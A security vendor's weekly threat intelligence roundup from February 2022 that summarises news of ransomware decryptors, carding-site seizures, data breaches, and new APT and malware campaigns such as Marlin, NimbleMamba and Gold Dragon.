Go to listing page

Cyware Weekly Threat Intelligence, February 07–11, 2022

Cyware Weekly Threat Intelligence, February 07–11, 2022

Share Blog Post

The Good

It rained ransomware decryptors this week. A former operator and self-proclaimed developer for Maze, Egregor, and Sekhmet released decryptors for the victims. They claimed that this was a planned course of action and has nothing to do with recent takedown efforts by law enforcement. Russia took down three prolific online shops for stolen payment card data and stated that similar domains will be targeted in the near future. 

  • Decryptors for three infamous ransomware families—Maze, Egregor, and Sekhmet—have been recently released by an operator named ‘Topleak.’ Meanwhile, there is also a free Emsisoft decryptor for the above-mentioned ransomware.
  • Avast has released a decryption utility to recover files encrypted by TargetCompany ransomware for free. The decryptor works by cracking the password that has been appended to the encrypted files.
  • In the light of rising sophisticated cyberattacks targeting critical infrastructure throughout 2021, cybersecurity agencies from Australia, the U.K, and the U.S. released a joint advisory that offers trends, behaviors of criminals while also underlining recommendations for mitigation.
  • The crackdown on cybercrime in Russia continues with authorities seizing three carding marketplaces, namely Ferum Shop, Sky-Fraud, and Trump’s Dumps. The Russian Federation, furthermore, detained six people who were allegedly members of a group involved in trading stolen credit cards.
  • The U.S. Department of Justice seized almost $4.5 billion worth of cryptocurrency, stolen during the 2016 Bitfinex crypto exchange hack. A Manhattan couple has been arrested for stealing 119,756 Bitcoins in the attack.  
  • From April, Microsoft will disable macros in Office files downloaded from the internet. Documents downloaded from untrusted sources will have a Mark of the Web (MOTW) attribute to block macros. The changes will be implemented in the current version of Office, with patches for Office LTSC and Office versions 2013, 2016, 2019, and 2021.

The Bad

Once again, a government agency was the target of a major cyberattack. Unidentified adversaries attacked the U.K Foreign Office, in what is suspected to be a cyberespionage campaign. In a new revelation, the BlackCat ransomware group claimed to be former members of the now-defunct DarkSide gang. However, the elephant in the room is this APT group that remained hidden for a decade. Named ModifiedElephant, researchers have finally shed light on its operations. 

  • More than 500 online stores running the outdated Magento 1 platform were compromised in a large-scale digital skimming attack. Researchers indicate that nearly 19 backdoors were deployed on compromised systems. All of these websites were compromised by exploiting a known vulnerability in the Quickview plugin.
  • Threat actors are using a Windows living-off-the-land binary (LOLBin) known as Regsvr32 to drop trojans like Lokibot and Qbot. The tactic allows attackers to bypass application whitelisting during the execution phase of the attack.
  • The U.K Foreign Office was the target of a serious cybersecurity incident. According to media reports, attackers infiltrated Foreign Commonwealth and Development Office (FCDO) systems. Nevertheless, not many details were available about the attack, and BAE Systems Applied Intelligence was called for urgent remediation.
  • Threat actors are using fake Windows 11 upgrade installers to trick users into downloading the RedLine stealer malware. The malware is currently being used to pilfer passwords, browser cookies, credit card details, and cryptocurrency wallet information. According to researchers, the attackers are using a seemingly legitimate ‘windows-upgraded.com’ domain for the malware distribution as part of their campaign.
  • Data of over 6,000 Puma employees was stolen following a ransomware attack in December 2021 that hit HR management platform Ultimate Kronos Group (UKG). The theft of the data was confirmed by Kronos on January 7. In its notification, Kronos informed that the attackers had accessed its cloud-based environment before deploying the ransomware.
  • The blockchain infrastructures of Meter and Moonriver networks were hacked, allowing attackers to steal $4.4 million in ETH and BTC. The attackers had exploited a feature that automatically wrapped and unwrapped gas tokens to pilfer the fund.
  • The BlackCat ransomware gang has confirmed that they are former members of the notorious BlackMatter/DarkSide ransomware. Discovered in November 2021, the ransomware is written in Rust language. It uses different encryption methods to encrypt files across a wide range of corporate environments.
  • CyberNews researchers uncovered five clones of The Pirate Bay, erected by scammers to serve malicious ads. The malvertising campaigns were impacting more than 7 million online users per month.
  • The Memorial Hermann Health System is notifying patients about a cyberattack that impacted their PHI. According to the health system, the incident has affected the information of 6,260 patients. The affected information includes first names, last names, dates of birth, driver’s license numbers, and health insurance information of individuals.
  • A cyberattack disrupted the operations of Pop TV, Slovenia’s most popular TV channel. The attack took place on February 09, following which the employees were prevented from adding new content to the platform. 
  • Data belonging to Ohlone Community College District (OCDD) network in Fremont, California, has been compromised in a sophisticated cyberattack. This includes Social Security Numbers, dates of birth, driver’s license number, medical information, and bank account details of individuals.
  • Data stolen from accounting conglomerate Optionis Group by the Vice Society ransomware group has surfaced on the dark web. Report suggests that the exposed data include spreadsheets for management accounts, timesheets for contractors, as well as letters associated with HM Revenue and Customs.
  • Detailing about the tactics of ModifiedElephant APT, researchers revealed that the attackers relied on spear-phishing emails with malicious attachments for over a decade now to launch cyberespionage campaigns. On multiple occasions, the attached documents included exploits for CVE-2012-0158, CVE-2013-3906, CVE-2014-1761, and CVE-2015-1641. The emails were used to push keyloggers, remote access trojans like NetWire and DarkComet, and even Android malware.

New Threats

Coming to other new developments in the threat landscape this week, Medusa and Flubot have joined hands and their infection rates are drastically rising. The Out to Sea campaign, conducted by OilRig APT, has been going on for quite some time now. It shows no signs of drowning as a new backdoor—Marlin—has been introduced. Molerats has been slithering around with a new campaign and a previously undocumented implant, NimbleMamba. It has already dug its fangs into Middle Eastern entities. 

  • A new variant of FritzFrog botnet, which comes with new features such as the use of the Tor proxy chain, has managed to make 24,000 attack attempts within a month. The target list includes organizations in the healthcare, education, and government sectors. Researchers claim that the operators are in the process of adding capabilities to target WordPress servers.
  • A new wave of attack campaigns from the Kimsuky hacking group has been found delivering a custom backdoor malware dubbed Gold Dragon. Gold Dragon is a second-stage backdoor that establishes persistence on the victim’s system. Furthermore, it helps the attackers install the xRAT tool to manually steal sensitive data from the targeted system.
  • A new backdoor dubbed Marlin has been associated with a long-running espionage campaign named Out to Sea that started in April 2018. The malware is a new addition to the arsenal of OilRig aka APT34 threat actor group. Victims of the campaign include diplomatic organizations, technology companies, and medical organizations in Israel, Tunisia, and the United Arab Emirates.
  • A threat actor tracked as Molerats has been associated with a new campaign that leverages a previously undocumented implant named NimbleMamba. The sophisticated attack campaign has targeted Middle Eastern governments, foreign policy think tanks, a state-affiliated airline, and a security firm. The new malware is believed to be an upgraded version of the SharpStage backdoor.
  • Researchers have detected some new activity in the Roaming Mantis attack campaign that has been active since 2018. The attackers have made changes in the Android trojan Wroba to target Android and iPhone users in Germany and France. Designed to steal credentials and distribute malware, the campaign is executed via malicious apps and phishing pages.
  • Security analysts at Vade found cybercriminals launching Right-to-Left Override attacks in a new bait to lure victims into accessing malicious files in order to steal their Office 365 credentials.
  • New attack campaigns that target Android users with Flubot and Medusa trojans have been uncovered by researchers. Both the malware are distributed via SMS phishing infrastructures that prompt users to install a missed package delivery app or fake version of Flash Player. While Medusa has so far infected 1,500 devices with targets in Canada, Turkey, and the U.S., Flubot has evolved to target users across Europe.
  • Siemens released nine advisories to address 27 new flaws in its SIMATIC products. The vulnerabilities, if exploited, could allow the attackers to remotely launch DoS attacks against several Siemens PLCs and related products.  


gold dragon
blackcat ransomware
optionis group
wroba trojan
molerats apt
pop tv
marlin backdoor
fritzfrog botnet
right to left override rlo
ransomware decryptors
roaming mantis
web skimming attacks

Posted on: February 11, 2022

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.